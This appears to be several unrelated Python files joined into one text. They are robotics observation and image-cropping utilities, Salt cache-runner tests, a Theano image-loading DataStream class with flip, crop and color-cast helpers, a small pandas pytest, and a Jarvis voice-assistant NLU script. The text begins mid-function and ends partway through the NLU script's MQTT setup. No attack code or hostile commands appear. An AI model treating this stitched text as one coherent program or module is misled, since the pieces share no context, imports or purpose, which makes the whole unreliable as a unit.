initialize_obs_utils_with_config(config): """ Utility function to parse config and call @initialize_obs_utils_with_obs_specs with the correct arguments. 
Args: config (BaseConfig instance): config object """ if config.algo_name == "hbc": obs_modality_specs = [ config.observation.planner.modalities, config.observation.actor.modalities, ] elif config.algo_name == "iris": obs_modality_specs = [ config.observation.value_planner.planner.modalities, config.observation.value_planner.value.modalities, config.observation.actor.modalities, ] else: obs_modality_specs = [config.observation.modalities] initialize_obs_utils_with_obs_specs(obs_modality_specs=obs_modality_specs) def key_is_obs_type(key, obs_type): """ Check if observation key corresponds to a type @obs_type. Args: key (str): modality name to check obs_type (str): observation type - usually one of "low_dim" or "image" """ assert OBS_TYPE_TO_MODALITIES is not None, "error: must call ObsUtils.initialize_obs_utils_with_obs_config first" return (key in OBS_TYPE_TO_MODALITIES[obs_type]) def key_is_image(key): """ Check if observation key corresponds to image observation. """ return key_is_obs_type(key, obs_type="image") def center_crop(im, t_h, t_w): """ Takes a center crop of an image. Args: im (np.array or torch.Tensor): image of shape (..., height, width, channel) t_h (int): height of crop t_w (int): width of crop Returns: im (np.array or torch.Tensor): center cropped image """ assert(im.shape[-3] >= t_h and im.shape[-2] >= t_w) assert(im.shape[-1] in [1, 3]) crop_h = int((im.shape[-3] - t_h) / 2) crop_w = int((im.shape[-2] - t_w) / 2) return im[..., crop_h:crop_h + t_h, crop_w:crop_w + t_w, :] def batch_image_hwc_to_chw(im): """ Channel swap for images - useful for preparing images for torch training. Args: im (np.array or torch.Tensor): image of shape (batch, height, width, channel) or (height, width, channel) Returns: im (np.array or torch.Tensor): image of shape (batch, channel, height, width) or (channel, height, width) """ start_dims = np.arange(len(im.shape) - 3).tolist() s = start_dims[-1] if len(start_dims) > 0 else -1 if isinstance(im, np.ndarray): return im.transpose(start_dims + [s + 3, s + 1, s + 2]) else: return im.permute(start_dims + [s + 3, s + 1, s + 2]) def batch_image_chw_to_hwc(im): """ Inverse of channel swap in @batch_image_hwc_to_chw. Args: im (np.array or torch.Tensor): image of shape (batch, channel, height, width) or (channel, height, width) Returns: im (np.array or torch.Tensor): image of shape (batch, height, width, channel) or (height, width, channel) """ start_dims = np.arange(len(im.shape) - 3).tolist() s = start_dims[-1] if len(start_dims) > 0 else -1 if isinstance(im, np.ndarray): return im.transpose(start_dims + [s + 2, s + 3, s + 1]) else: return im.permute(start_dims + [s + 2, s + 3, s + 1]) def process_obs(obs_dict): """ Process image observations in observation dictionary to prepare for network input. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. Returns: new_dict (dict): dictionary where image modalities have been processsed by @process_image """ new_dict = { k : obs_dict[k] for k in obs_dict } # shallow copy for k in new_dict: if key_is_image(k): new_dict[k] = process_image(new_dict[k]) return new_dict def process_image(image): """ Given image fetched from dataset, process for network input. Converts array to float (from uint8), normalizes pixels to [0, 1], and channel swaps from (H, W, C) to (C, H, W). 
Args: image (np.array or torch.Tensor): image array Returns: processed_image (np.array or torch.Tensor): processed image """ assert image.shape[-1] == 3 # check for channel dimensions image = TU.to_float(image) image /= 255. image = batch_image_hwc_to_chw(image) return image def unprocess_obs(obs_dict): """ Prepare processed image observations for saving to dataset. Inverse of @process_obs. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. Returns: new_dict (dict): dictionary where image modalities have been processsed by @unprocess_image """ new_dict = { k : obs_dict[k] for k in obs_dict } # shallow copy for k in new_dict: if key_is_image(k): new_dict[k] = unprocess_image(new_dict[k]) return new_dict def unprocess_image(image): """ Given image prepared for network input, prepare for saving to dataset. Inverse of @process_image. Args: image (np.array or torch.Tensor): image array Returns: unprocessed_image (np.array or torch.Tensor): image passed through inverse operation of @process_image """ assert image.shape[-3] == 3 # check for channel dimension image = batch_image_chw_to_hwc(image) image *= 255. image = TU.to_uint8(image) return image def process_image_shape(image_shape): """ Given image shape in dataset, infer the network input shape. This accounts for the channel swap to prepare images for torch training (see @process_image). Args: image_shape (tuple or list): tuple or list of size 3 or 4, corresponding to the image shape to process Returns: processed_image_shape (tuple): image shape that would result from the output of @process_image """ if len(image_shape) == 3: return image_shape[2], image_shape[0], image_shape[1] elif len(image_shape) == 4: return image_shape[0], image_shape[3], image_shape[1], image_shape[2] else: raise ValueError("cannot handle image shape {}".format(image_shape)) def normalize_obs(obs_dict, obs_normalization_stats): """ Normalize observations using the provided "mean" and "std" entries for each observation modality. The observation dictionary will be modified in-place. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. obs_normalization_stats (dict): this should map observation modality keys to dicts with a "mean" and "std" of shape (1, ...) where ... is the default shape for the observation. Returns: obs_dict (dict): obs dict with normalized observation arrays """ # ensure we have statistics for each modality key in the observation assert set(obs_dict.keys()).issubset(obs_normalization_stats) for m in obs_dict: mean = obs_normalization_stats[m]["mean"] std = obs_normalization_stats[m]["std"] # check shape consistency shape_len_diff = len(mean.shape) - len(obs_dict[m].shape) assert shape_len_diff in [0, 1], "shape length mismatch in @normalize_obs" assert mean.shape[shape_len_diff:] == obs_dict[m].shape, "shape mismatch in @normalize obs" # handle case where obs dict is not batched by removing stats batch dimension if shape_len_diff == 1: mean = mean[0] std = std[0] obs_dict[m] = (obs_dict[m] - mean) / std return obs_dict def has_image(obs_keys): """ Returns True if image modalities are present in the list of modalities. 
Args: obs_key (list): list of modalities """ for k in obs_keys: if key_is_image(k): return True return False def repeat_and_stack_observation(obs_dict, n): """ Given an observation dictionary and a desired repeat value @n, this function will return a new observation dictionary where each modality is repeated @n times and the copies are stacked in the first dimension. For example, if a batch of 3 observations comes in, and n is 2, the output will look like [ob1; ob1; ob2; ob2; ob3; ob3] in each modality. Args: obs_dict (dict): dictionary mappping observation modality to np.array or torch.Tensor. Leading batch dimensions are optional. n (int): number to repeat by Returns: repeat_obs_dict (dict): repeated obs dict """ return TU.repeat_by_expand_at(obs_dict, repeats=n, dim=0) def crop_image_from_indices(images, crop_indices, crop_height, crop_width): """ Crops images at the locations specified by @crop_indices. Crops will be taken across all channels. Args: images (torch.Tensor): batch of images of shape [..., C, H, W] crop_indices (torch.Tensor): batch of indices of shape [..., N, 2] where N is the number of crops to take per image and each entry corresponds to the pixel height and width of where to take the crop. Note that the indices can also be of shape [..., 2] if only 1 crop should be taken per image. Leading dimensions must be consistent with @images argument. Each index specifies the top left of the crop. Values must be in range [0, H - CH - 1] x [0, W - CW - 1] where H and W are the height and width of @images and CH and CW are @crop_height and @crop_width. crop_height (int): height of crop to take crop_width (int): width of crop to take Returns: crops (torch.Tesnor): cropped images of shape [..., C, @crop_height, @crop_width] """ # make sure length of input shapes is consistent assert crop_indices.shape[-1] == 2 ndim_im_shape = len(images.shape) ndim_indices_shape = len(crop_indices.shape) assert (ndim_im_shape == ndim_indices_shape + 1) or (ndim_im_shape == ndim_indices_shape + 2) # maybe pad so that @crop_indices is shape [..., N, 2] is_padded = False if ndim_im_shape == ndim_indices_shape + 2: crop_indices = crop_indices.unsqueeze(-2) is_padded = True # make sure leading dimensions between images and indices are consistent assert images.shape[:-3] == crop_indices.shape[:-2] device = images.device image_c, image_h, image_w = images.shape[-3:] num_crops = crop_indices.shape[-2] # make sure @crop_indices are in valid range assert (crop_indices[..., 0] >= 0).all().item() assert (crop_indices[..., 0] < (image_h - crop_height)).all().item() assert (crop_indices[..., 1] >= 0).all().item() assert (crop_indices[..., 1] < (image_w - crop_width)).all().item() # convert each crop index (ch, cw) into a list of pixel indices that correspond to the entire window. # 2D index array with columns [0, 1, ..., CH - 1] and shape [CH, CW] crop_ind_grid_h = torch.arange(crop_height).to(device) crop_ind_grid_h = TU.unsqueeze_expand_at(crop_ind_grid_h, size=crop_width, dim=-1) # 2D index array with rows [0, 1, ..., CW - 1] and shape [CH, CW] crop_ind_grid_w = torch.arange(crop_width).to(device) crop_ind_grid_w = TU.unsqueeze_expand_at(crop_ind_grid_w, size=crop_height, dim=0) # combine into shape [CH, CW, 2] crop_in_grid = torch.cat((crop_ind_grid_h.unsqueeze(-1), crop_ind_grid_w.unsqueeze(-1)), dim=-1) # Add above grid with the offset index of each sampled crop to get 2d indices for each crop. 
# After broadcasting, this will be shape [..., N, CH, CW, 2] and each crop has a [CH, CW, 2] # shape array that tells us which pixels from the corresponding source image to grab. grid_reshape = [1] * len(crop_indices.shape[:-1]) + [crop_height, crop_width, 2] all_crop_inds = crop_indices.unsqueeze(-2).unsqueeze(-2) + crop_in_grid.reshape(grid_reshape) # For using @torch.gather, convert to flat indices from 2D indices, and also # repeat across the channel dimension. To get flat index of each pixel to grab for # each sampled crop, we just use the mapping: ind = h_ind * @image_w + w_ind all_crop_inds = all_crop_inds[..., 0] * image_w + all_crop_inds[..., 1] # shape [..., N, CH, CW] all_crop_inds = TU.unsqueeze_expand_at(all_crop_inds, size=image_c, dim=-3) # shape [..., N, C, CH, CW] all_crop_inds = TU.flatten(all_crop_inds, begin_axis=-2) # shape [..., N, C, CH * CW] # Repeat and flatten the source images -> [..., N, C, H * W] and then use gather to index with crop pixel inds images_to_crop = TU.unsqueeze_expand_at(images, size=num_crops, dim=-4) images_to_crop = TU.flatten(images_to_crop, begin_axis=-2) crops = torch.gather(images_to_crop, dim=-1, index=all_crop_inds) # [..., N, C, CH * CW] -> [..., N, C, CH, CW] reshape_axis = len(crops.shape) - 1 crops = TU.reshape_dimensions(crops, begin_axis=reshape_axis, end_axis=reshape_axis, target_dims=(crop_height, crop_width)) if is_padded: # undo padding -> [..., C, CH, CW] crops = crops.squeeze(-4) return crops def sample_random_image_crops(images, crop_height, crop_width, num_crops, pos_enc=False): """ For each image, randomly sample @num_crops crops of size (@crop_height, @crop_width), from @images. Args: images (torch.Tensor): batch of images of shape [..., C, H, W] crop_height (int): height of crop to take crop_width (int): width of crop to take num_crops (n): number of crops to sample pos_enc (bool): if True, also add 2 channels to the outputs that gives a spatial encoding of the original source pixel locations. This means that the output crops will contain information about where in the source image it was sampled from. Returns: crops (torch.Tensor): crops of shape (..., @num_crops, C, @crop_height, @crop_width) if @pos_enc is False, otherwise (..., @num_crops, C + 2, @crop_height, @crop_width) crop_inds (torch.Tensor): sampled crop indices of shape (..., N, 2) """ device = images.device # maybe add 2 channels of spatial encoding to the source image source_im = images if pos_enc: # spatial encoding [y, x] in [0, 1] h, w = source_im.shape[-2:] pos_y, pos_x = torch.meshgrid(torch.arange(h), torch.arange(w)) pos_y = pos_y.float().to(device) / float(h) pos_x = pos_x.float().to(device) / float(w) position_enc = torch.stack((pos_y, pos_x)) # shape [C, H, W] # unsqueeze and expand to match leading dimensions -> shape [..., C, H, W] leading_shape = source_im.shape[:-3] position_enc = position_enc[(None,) * len(leading_shape)] position_enc = position_enc.expand(*leading_shape, -1, -1, -1) # concat across channel dimension with input source_im = torch.cat((source_im, position_enc), dim=-3) # make sure sample boundaries ensure crops are fully within the images image_c, image_h, image_w = source_im.shape[-3:] max_sample_h = image_h - crop_height max_sample_w = image_w - crop_width # Sample crop locations for all tensor dimensions up to the last 3, which are [C, H, W]. 
# Each gets @num_crops samples - typically this will just be the batch dimension (B), so # we will sample [B, N] indices, but this supports having more than one leading dimension, # or possibly no leading dimension. # # Trick: sample in [0, 1) with rand, then re-scale to [0, M) and convert to long to get sampled ints crop_inds_h = (max_sample_h * torch.rand(*source_im.shape[:-3], num_crops).to(device)).long() crop_inds_w = (max_sample_w * torch.rand(*source_im.shape[:-3], num_crops).to(device)).long() crop_inds = torch.cat((crop_inds_h.unsqueeze(-1), crop_inds_w.unsqueeze(-1)), dim=-1) # shape [..., N, 2] crops = crop_image_from_indices( images=source_im, crop_indices=crop_inds, crop_height=crop_height, crop_width=crop_width, ) return crops, crop_inds
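# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). It assumes numpy and
# torch are importable and only exercises helpers whose implementations appear
# above; the shapes and the "proprio" key name are illustrative.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    import numpy as np
    import torch

    # shape bookkeeping: dataset stores HWC, the network consumes CHW
    assert process_image_shape((84, 84, 3)) == (3, 84, 84)
    assert process_image_shape((16, 84, 84, 3)) == (16, 3, 84, 84)

    # normalize an unbatched low-dim observation with per-modality stats
    obs = {"proprio": np.ones(7, dtype=np.float32)}
    stats = {"proprio": {"mean": np.zeros((1, 7), dtype=np.float32),
                         "std": 2.0 * np.ones((1, 7), dtype=np.float32)}}
    normed = normalize_obs(obs, stats)
    assert np.allclose(normed["proprio"], 0.5)

    # sample 2 random 64x64 crops per image from a batch of CHW images
    images = torch.rand(4, 3, 84, 84)
    crops, crop_inds = sample_random_image_crops(
        images=images, crop_height=64, crop_width=64, num_crops=2, pos_enc=False)
    assert crops.shape == (4, 2, 3, 64, 64)
    assert crop_inds.shape == (4, 2, 2)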
nilq/baby-python
python
# -*- coding: utf-8 -*- """ Tests for the salt-run command """ from __future__ import absolute_import, print_function, unicode_literals import logging import pytest from tests.support.case import ShellCase from tests.support.helpers import slowTest log = logging.getLogger(__name__) @pytest.mark.usefixtures("salt_sub_minion") class CacheTest(ShellCase): """ Test the cache runner. """ @slowTest def test_cache(self): """ Store, list, fetch, then flush data """ # Store the data ret = self.run_run_plus( "cache.store", bank="cachetest/runner", key="test_cache", data="The time has come the walrus said", ) # Make sure we can see the new key ret = self.run_run_plus("cache.list", bank="cachetest/runner") self.assertIn("test_cache", ret["return"]) # Make sure we can see the new data ret = self.run_run_plus( "cache.fetch", bank="cachetest/runner", key="test_cache" ) self.assertIn("The time has come the walrus said", ret["return"]) # Make sure we can delete the data ret = self.run_run_plus( "cache.flush", bank="cachetest/runner", key="test_cache" ) ret = self.run_run_plus("cache.list", bank="cachetest/runner") self.assertNotIn("test_cache", ret["return"]) @slowTest def test_cache_invalid(self): """ Store, list, fetch, then flush data """ # Store the data ret = self.run_run_plus("cache.store",) # Make sure we can see the new key expected = "Passed invalid arguments:" self.assertIn(expected, ret["return"]) @slowTest def test_grains(self): """ Test cache.grains """ # Store the data ret = self.run_run_plus("cache.grains", tgt="minion") self.assertIn("minion", ret["return"]) @slowTest def test_pillar(self): """ Test cache.pillar """ # Store the data ret = self.run_run_plus("cache.pillar", tgt="minion") assert "minion" in ret["return"] assert "sub_minion" not in ret["return"] @slowTest def test_pillar_no_tgt(self): """ Test cache.pillar when no tgt is supplied. This should return pillar data for all minions """ # Store the data ret = self.run_run_plus("cache.pillar",) assert all(x in ret["return"] for x in ["minion", "sub_minion"]) @slowTest def test_pillar_minion_noexist(self): """ Test cache.pillar when the target does not exist """ ret = self.run_run_plus("cache.pillar", tgt="doesnotexist") assert "minion" not in ret["return"] assert "sub_minion" not in ret["return"] @slowTest def test_pillar_minion_tgt_type_pillar(self): """ Test cache.pillar when the target exists and tgt_type is pillar """ ret = self.run_run_plus("cache.pillar", tgt="monty:python", tgt_type="pillar",) assert all(x in ret["return"] for x in ["minion", "sub_minion"]) @slowTest def test_mine(self): """ Test cache.mine """ # Store the data ret = self.run_run_plus("cache.mine", tgt="minion") self.assertIn("minion", ret["return"])
nilq/baby-python
python
from os import listdir, path import random import csv import re import natsort import numpy import theano from skimage.io import imread from block_designer import BlockDesigner from sampler import Sampler import pdb class ImageFlipOracle(object): """ *_flip methods should take an image_name """ def __init__(self, flip_mode): self.noise = 0 if re.search('\.csv', flip_mode): self.image_name_to_flip_coord = {} with open(flip_mode, 'rb') as csvfile: reader = csv.reader(csvfile) next(reader, None) for row in reader: image_name = row[0] flip_coords = [int(row[1]), int(row[2])] self.image_name_to_flip_coord[image_name] = flip_coords def get_flip_lambda(self, flip_mode, deterministic=False): if re.search('\.csv', flip_mode): if deterministic: return self.align_flip else: return self.noisy_align_flip else: return { "no_flip": self.no_flip, "rand_flip": self.rand_flip, "align_flip": self.align_flip, "noisy_align_flip": self.noisy_align_flip }[flip_mode] def no_flip(self, image_name): return numpy.zeros(2) def rand_flip(self, image_name): return numpy.array([int(round(random.random())), int(round(random.random()))]) def align_flip(self, image_name): return numpy.array(self.image_name_to_flip_coord[image_name]) def noisy_align_flip(self, image_name): """ :param noise: float (0,1) where 1 is fully noise and 0 is fully deterministic. If greater than 0, predetermined correct flips will be swapped with a random flip with Pr(noise) """ if random.random() < self.noise: return ((self.align_flip(image_name) + self.rand_flip(image_name)) % 2) else: return self.align_flip(image_name) def reset_noise(self, level): assert(level >= 0 and level <= 1) self.noise = level class CropOracle(object): def __init__(self, out_dim): self.out_dim = out_dim def bottom_right_crop(self, img): h,w,c = img.shape max_t = h - self.out_dim max_l = w - self.out_dim return(max_t,h, max_l,w) def center_crop(self, img): max_t,h, max_l,w = self.bottom_right_crop(img) center_t = max_t / 2 center_l = max_l / 2 return(center_t, center_t + self.out_dim, center_l, center_l + self.out_dim) def uniform_crop(self, img): max_t,h, max_l,w = self.bottom_right_crop(img) rand_t = random.randint(0, max_t) rand_l = random.randint(0, max_l) return(rand_t, rand_t + self.out_dim, rand_l, rand_l + self.out_dim) def get_crop_lambda(self, mode): return { "center_crop": self.center_crop, "uniform_crop": self.uniform_crop }[mode] class ColorCastOracle(object): def __init__(self, n_channels, color_cast_range): self.n_channels = n_channels self.color_cast_range = color_cast_range def no_cast(self): return numpy.zeros(self.n_channels) def baidu_cast(self): # http://arxiv.org/abs/1501.02876v3 s = self.color_cast_range / 3.0 # 99.73% of values within 3 std deviations casts = [] mask = [] while len(casts) < self.n_channels: casts.append(numpy.random.normal(scale=s)) mask.append(round(random.random())) return(numpy.array(casts, dtype=int) * numpy.array(mask, dtype=int)) def get_color_cast_lambda(self, mode): return { "no_cast": self.no_cast, "baidu_cast": self.baidu_cast }[mode] class DataStream(object): """ Provides an interface for easily filling and replacing GPU cache of images """ def __init__(self, train_image_dir="data/train/centered_crop/", train_labels_csv_path="data/train/trainLabels.csv", image_shape=(128, 128, 3), batch_size=128, cache_size_factor=8, center=0, normalize=0, amplify=1, train_flip='no_flip', shuffle=1, test_image_dir=None, random_seed=None, valid_dataset_size=4864, valid_flip='no_flip', test_flip='no_flip', sample_class=None, 
custom_distribution=None, train_color_cast='no_cast', valid_color_cast='no_cast', test_color_cast='no_cast', color_cast_range=20, pre_train_crop='center_crop', train_crop='uniform_crop', valid_test_crop='center_crop', image_extension='.png'): self.train_image_dir = train_image_dir self.test_image_dir = test_image_dir self.image_shape = image_shape self.batch_size = batch_size self.cache_size = (self.batch_size * cache_size_factor) # size in images self.center = center self.mean = None self.normalize = normalize self.std = None self.amplify = amplify self.train_set_flipper = ImageFlipOracle(train_flip) test_set_flipper = ImageFlipOracle(test_flip) self.train_flip_lambda = self.train_set_flipper.get_flip_lambda(train_flip) self.valid_flip_lambda = self.train_set_flipper.get_flip_lambda(valid_flip, deterministic=True) self.test_flip_lambda = test_set_flipper.get_flip_lambda(test_flip, deterministic=True) self.valid_dataset_size = valid_dataset_size self.random_seed = random_seed self.sample_class = sample_class self.custom_distribution = custom_distribution color_cast_oracle = ColorCastOracle(self.image_shape[-1], color_cast_range) self.train_color_cast_lambda = color_cast_oracle.get_color_cast_lambda(train_color_cast) self.valid_color_cast_lambda = color_cast_oracle.get_color_cast_lambda(valid_color_cast) self.test_color_cast_lambda = color_cast_oracle.get_color_cast_lambda(test_color_cast) crop_oracle = CropOracle(self.image_shape[0]) self.pre_train_crop_lambda = crop_oracle.get_crop_lambda(pre_train_crop) self.train_crop_lambda = crop_oracle.get_crop_lambda(train_crop) self.valid_test_crop_lambda = crop_oracle.get_crop_lambda(valid_test_crop) self.image_extension = image_extension bd = BlockDesigner(train_labels_csv_path, seed=self.random_seed) self.K = bd.K valid_examples = bd.break_off_block(self.valid_dataset_size) self.train_examples = bd.remainder() self.n_train_batches = int(bd.size() / self.batch_size) self.valid_dataset = self.setup_valid_dataset(valid_examples) self.train_dataset = None if shuffle else self.setup_train_dataset() self.test_dataset = self.setup_test_dataset() self.n_test_examples = len(self.test_dataset["X"]) if self.sample_class: self.n_train_batches = int(len(self.train_dataset["X"]) / self.batch_size) # override in case Sampler is used (TODO make this neater) self.train_dataset_size = self.n_train_batches * self.batch_size if self.center == 1 or self.normalize == 1: self.calc_mean_std_image() def valid_set(self): all_val_images = numpy.zeros(((len(self.valid_dataset["y"]),) + self.image_shape), dtype=theano.config.floatX) for i, image in enumerate(self.valid_dataset["X"]): all_val_images[i, ...] 
= self.feed_image(image, self.train_image_dir, self.valid_test_crop_lambda, self.valid_flip_lambda, self.valid_color_cast_lambda) # b01c, Theano: bc01 CudaConvnet: c01b return numpy.rollaxis(all_val_images, 3, 1), numpy.array(self.valid_dataset["y"], dtype='int32') def train_buffer(self, new_flip_noise=None): """ Yields a x_cache_block, has a size that is a multiple of training batches """ if new_flip_noise: self.train_set_flipper.reset_noise(new_flip_noise) train_dataset = self.train_dataset or self.setup_train_dataset() x_cache_block = numpy.zeros(((self.cache_size,) + self.image_shape), dtype=theano.config.floatX) n_cache_blocks = int(len(train_dataset["y"]) / float(self.cache_size)) # rounding down skips the leftovers if not n_cache_blocks: raise ValueError("Train dataset length %i is too small for cache size %i" % (len(train_dataset["y"]), self.cache_size)) for ith_cache_block in xrange(n_cache_blocks): ith_cache_block_end = (ith_cache_block + 1) * self.cache_size ith_cache_block_slice = slice(ith_cache_block * self.cache_size, ith_cache_block_end) for i, image in enumerate(train_dataset["X"][ith_cache_block_slice]): x_cache_block[i, ...] = self.feed_image(image, self.train_image_dir, self.train_crop_lambda, self.train_flip_lambda, self.train_color_cast_lambda) yield numpy.rollaxis(x_cache_block, 3, 1), numpy.array(train_dataset["y"][ith_cache_block_slice], dtype='int32') def test_buffer(self): """ Yields a x_cache_block, has a size that is a multiple of training batches """ x_cache_block = numpy.zeros(((self.cache_size,) + self.image_shape), dtype=theano.config.floatX) n_full_cache_blocks, n_leftovers = divmod(len(self.test_dataset["X"]), self.cache_size) if not n_full_cache_blocks: raise ValueError("Test dataset length %i is too small for cache size %i" % (len(self.test_dataset["X"]), self.cache_size)) for ith_cache_block in xrange(n_full_cache_blocks): ith_cache_block_end = (ith_cache_block + 1) * self.cache_size ith_cache_block_slice = slice(ith_cache_block * self.cache_size, ith_cache_block_end) idxs_to_full_dataset = list(range(ith_cache_block * self.cache_size, ith_cache_block_end)) for i, image in enumerate(self.test_dataset["X"][ith_cache_block_slice]): x_cache_block[i, ...] = self.feed_image(image, self.test_image_dir, self.valid_test_crop_lambda, self.test_flip_lambda, self.test_color_cast_lambda) yield numpy.rollaxis(x_cache_block, 3, 1), numpy.array(idxs_to_full_dataset, dtype='int32') # sneak the leftovers out, padded by the previous full cache block if n_leftovers: leftover_slice = slice(ith_cache_block_end, ith_cache_block_end + n_leftovers) for i, image in enumerate(self.test_dataset["X"][leftover_slice]): idxs_to_full_dataset[i] = ith_cache_block_end + i x_cache_block[i, ...] = self.feed_image(image, self.test_image_dir, self.valid_test_crop_lambda, self.test_flip_lambda, self.test_color_cast_lambda) yield numpy.rollaxis(x_cache_block, 3, 1), numpy.array(idxs_to_full_dataset, dtype='int32') def read_image(self, image_name, image_dir, crop_lambda, extension): """ :type image: string """ as_grey = True if self.image_shape[2] == 1 else False img = imread(image_dir + image_name + extension, as_grey=as_grey) img = self.crop_image(img, crop_lambda) if crop_lambda else img img = img / 255. if len(img.shape) == 2: return img.reshape(img.shape + (1,)) # when grey, img might lack dimension else: return img def preprocess_image(self, image, flip_coords, color_cast): """ Important, use with read_image. 
This method assumes image is already standardized to have [0,1] pixel values """ image = self.flip_image(image, flip_coords) image = self.color_cast_image(image, color_cast) if not self.mean == None: image = image - self.mean if not self.std == None: image = image / (self.std + 1e-5) return self.amplify * image def crop_image(self, img, crop_lambda): t,b,l,r = crop_lambda(img) assert(b-t == self.image_shape[0]) assert(r-l == self.image_shape[1]) return img[t:b, l:r, :] def color_cast_image(self, image, color_cast, masked=False): if masked: # Observed to perform much worse coloring = numpy.zeros(image.shape) + color_cast mask = (image > 0) / 255. return(image + (mask * coloring)) else: return(image + (color_cast/255.0)) def flip_image(self, image, flip_coords): assert(len(flip_coords) == 2) assert(max(flip_coords) <= 1) assert(min(flip_coords) >= 0) if flip_coords[0] == 1: image = numpy.flipud(image) if flip_coords[1] == 1: image = numpy.fliplr(image) return image def feed_image(self, image_name, image_dir, crop_lambda=None, flip_lambda=None, color_cast_lambda=None): img = self.read_image(image_name, image_dir, crop_lambda, self.image_extension) flip_coords = flip_lambda(image_name) if flip_lambda else numpy.zeros(2) color_cast = color_cast_lambda() if color_cast_lambda else numpy.zeros(self.image_shape[-1]) return self.preprocess_image(img, flip_coords, color_cast) def calc_mean_std_image(self): """ Streaming variance calc: http://math.stackexchange.com/questions/20593/calculate-variance-from-a-stream-of-sample-values Will not look at the validation set images """ print("Calculating mean and std dev image...") mean = numpy.zeros(self.image_shape, dtype=theano.config.floatX) mean_sqr = numpy.zeros(self.image_shape, dtype=theano.config.floatX) N = sum([len(ids) for y, ids in self.train_examples.items()]) # self.train_dataset_size + remainders for y, ids in self.train_examples.items(): for image in ids: img = self.read_image(image, self.train_image_dir, self.pre_train_crop_lambda, self.image_extension) mean += img mean_sqr += numpy.square(img) self.mean = mean / N self.std = numpy.sqrt(numpy.abs(mean_sqr / N - numpy.square(self.mean))) def setup_valid_dataset(self, block): images = [] labels = [] for y, ids in block.items(): for id in ids: images.append(id) labels.append(y) return {"X": images, "y": labels} def setup_train_dataset(self): """ Each self.batch_size of examples follows the same distribution """ bd = BlockDesigner(self.train_examples) if self.sample_class: samp = Sampler(bd.remainder(), seed=self.random_seed) images, labels = samp.custom_distribution(self.sample_class, self.batch_size, self.custom_distribution) return {"X": images, "y": labels} else: blocks = bd.break_off_multiple_blocks(self.n_train_batches, self.batch_size) images = [] labels = [] for block in blocks: for y, ids in block.items(): for id in ids: images.append(id) labels.append(y) return {"X": images, "y": labels} def setup_test_dataset(self): if self.test_image_dir: images = numpy.array([path.splitext(f)[0] for f in listdir(self.test_image_dir) if re.search('\.(jpeg|jpg|png)', f, flags=re.IGNORECASE)]) else: images = [] return {"X": natsort.natsorted(images)}
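# ---------------------------------------------------------------------------
# Hedged usage sketch (not part of the original module). DataStream itself
# needs image directories and a trainLabels.csv on disk, so this only
# exercises the small, self-contained oracle helpers, assuming the module's
# own imports (numpy, theano, skimage, ...) are available. The 128x128x3
# shape and the mode names below are illustrative.
# ---------------------------------------------------------------------------
if __name__ == "__main__":
    fake_img = numpy.random.rand(140, 140, 3)  # HWC image larger than the crop

    crop_oracle = CropOracle(out_dim=128)
    t, b, l, r = crop_oracle.get_crop_lambda("uniform_crop")(fake_img)
    assert (b - t, r - l) == (128, 128)

    flip_oracle = ImageFlipOracle("rand_flip")
    flip_coords = flip_oracle.get_flip_lambda("rand_flip")("img_001")  # name unused for random flips
    assert set(flip_coords).issubset({0, 1})

    cast_oracle = ColorCastOracle(n_channels=3, color_cast_range=20)
    cast = cast_oracle.get_color_cast_lambda("baidu_cast")()
    assert cast.shape == (3,)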
nilq/baby-python
python
from g2net.input import extract_dict_from_df import pandas as pd import pytest @pytest.mark.parametrize( 'data_dict, key_col, val_col, expected_dict', ( pytest.param( { 'col1': [1, 2, 5], 'col2': [3, 4, 6] }, 'col1', 'col2', { 1: 3, 2: 4, 5: 6 }, id='2-columns-only'), pytest.param( { 'col1': [1, 2, 5], 'col2': [3, 4, 6], 'col3': [-1, -2, -3] }, 'col3', 'col1', { -1: 1, -2: 2, -3: 5 }, id='3-columns'), ) ) def test_extract_dict_from_df(data_dict, key_col, val_col, expected_dict): # Given source_df = pd.DataFrame(data=data_dict) # When result_dict = extract_dict_from_df(source_df, key_col, val_col) # Then assert expected_dict == result_dict
nilq/baby-python
python
#
# Copyright (c) 2020 by Philipp Scheer. All Rights Reserved.
#

# usage: nlu.py [-h] [--config CONFIG]
#
# Natural language understanding engine using snips-nlu
# Convert spoken language into a command (skill) and arguments
#
# optional arguments:
#   -h, --help       show this help message and exit
#   --config CONFIG  Path to jarvis configuration file

## input: jarvis/stt -> command:[words]
## output: jarvis/nlu -> (started|stopped|error|intent:[intent]:probability:[probability]:slots:[slots])


## import global packages
import io, os, sys, time, json, argparse, configparser
import urllib.parse as urlparse
from http.server import BaseHTTPRequestHandler, HTTPServer

## import local packages
import lib.helper as helper
import snips_nlu


## set port for webserver
port = 1885


class Handler(BaseHTTPRequestHandler):
    def do_GET(self):
        global dataset
        self.send_response(200)
        self.send_header('Content-type', 'text/json')
        self.send_header('Access-Control-Allow-Origin', '*')
        self.end_headers()

        path = self.path.split("?")[0]
        arguments = urlparse.parse_qs((urlparse.urlparse(self.path)).query)

        if path == "/execute":
            try:
                cmd = arguments["command"][0]
                self.wfile.write(json.dumps({"success": True, "message": nlu.parse(cmd)}).encode())
            except KeyError:
                self.wfile.write(json.dumps({"success": False, "message": "need to set 'command' url argument"}).encode())
        if path == "/info":
            try:
                self.wfile.write(json.dumps({"success": True, "message": dataset}).encode())
            except KeyError:
                self.wfile.write(json.dumps({"success": False, "message": "something went wrong"}).encode())


# this function is being called when the stt engine detects a command
def handler(client, userdata, message):
    global nlu, mqtt
    data = message.payload.decode()
    if data.startswith("command:"):
        command = data.split(":")[1]
        parsed = nlu.parse(command)
        mqtt.publish("jarvis/nlu", json.dumps(parsed))


# add a description and parse arguments
parser = argparse.ArgumentParser(description="Natural language understanding engine using snips-nlu\nConvert spoken language into a command (skill) and arguments", formatter_class=argparse.RawTextHelpFormatter)
parser.add_argument("--config", type=str, help="Path to jarvis configuration file", default="../jarvis.conf")
parser.add_argument("--message", type=str, help="A string to run against the NLU (Might take several seconds)")
args = parser.parse_args()

# get the config file from argparse and read it
config = configparser.ConfigParser(interpolation=configparser.ExtendedInterpolation())
config.read(args.config)
config = config["nlu"]

# initialize mqtt/webserver instance
mqtt = helper.MQTT(client_id="nlu.py")
mqtt.on_message(handler)
mqtt.subscribe("jarvis/stt")
